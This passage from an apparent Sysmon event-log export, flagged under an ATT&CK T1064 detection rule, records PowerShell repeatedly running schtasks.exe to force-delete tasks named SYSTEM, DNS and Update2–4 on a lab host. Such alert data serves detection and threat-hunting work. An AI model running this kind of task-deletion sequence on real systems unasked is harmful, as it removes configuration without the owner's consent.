12:52:40.631"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010d64a3100}"",""processId"":""7968"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.389",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.578 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00102b493100} +ProcessId: 7336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.585618200Z"",""eventRecordID"":""3960"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.578\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00102b493100}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:40.578"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00102b493100}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.372",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.484 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-001081473100} +ProcessId: 1288 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.488394800Z"",""eventRecordID"":""3959"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.484\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-001081473100}\r\nProcessId: 1288\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.484"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-001081473100}"",""processId"":""1288"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.361",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.435 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010dc453100} +ProcessId: 3496 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.440934400Z"",""eventRecordID"":""3958"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.435\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010dc453100}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.435"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010dc453100}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.344",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.406 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f4433100} +ProcessId: 7252 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.409573400Z"",""eventRecordID"":""3957"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.406\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f4433100}\r\nProcessId: 7252\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.406"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010f4433100}"",""processId"":""7252"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:21:10.328",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.366 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-001045423100} +ProcessId: 7936 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.372336400Z"",""eventRecordID"":""3956"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.366\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-001045423100}\r\nProcessId: 7936\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.366"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-001045423100}"",""processId"":""7936"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.311",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.300 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00105b403100} +ProcessId: 4544 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.310198600Z"",""eventRecordID"":""3955"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.300\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00105b403100}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.300"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00105b403100}"",""processId"":""4544"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
